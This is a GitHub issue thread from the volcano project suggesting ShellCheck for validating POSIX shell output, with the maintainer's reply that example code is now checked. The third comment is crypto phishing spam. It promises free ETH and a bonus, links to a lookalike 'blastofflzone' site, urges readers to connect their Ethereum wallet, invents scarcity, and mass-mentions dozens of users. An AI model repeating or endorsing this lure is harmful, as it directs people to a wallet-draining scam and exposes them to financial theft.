### ISSUE TITLE
Use ShellCheck to validate POSIX spec

### ISSUE THREAD

**Issue by DLopezJr** [jcampbell05/volcano#2]
I suggest taking a look into [shellcheck](https://github.com/koalaman/shellcheck). 

It is currently the most widely used static analyzer for shell code. It supports the POSIX spec whenever a #!/bin/sh she-bang is used. Some sort of tests with this would provide some extremely robust and compatibility shell output code.

**Comment by jcampbell05** [comment]
This is a great suggestion, I've written a Volcano script `build_examples` which builds all of our example code and runs it via `shellcheck`.

Wouldn't take much work to wrap this into a Github Action as a next step but this has already given a lot of great feedback. We can considered this closed.

**Comment by pareshgami** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
qualiabyte, @cobject, @vis7, @Kingxiao, @gaosy87, @cheukw, @hikame, @doctorserone, @sadrasabouri, @hyperfact, @jderocher, @ssuvino1, @mcraveiro, @WillPerfect, @yangQingYu123, @antarts, @zkvm, @MaxTranced, @silverton, @Yassin9, @V0idk, @bdrhn9, @whitglint, @jslauthor, @TyssenLove, @BrunoRochaProgrammer, @ekeric13, @martindale, @ani12321, @zsq978663747, @ankoehn, @herrold, @kenyabe-etr, @surick, @frozenloop, @v6, @genjineos, @onepremise, @bimawa, @wyx520, @cnheider, @raonyguimaraes, @jamiedevsandbox, @shally9, @SiwenZhang, @vvvictorlee, @MrShadowalker, @srw, @asanch, @ruissalo
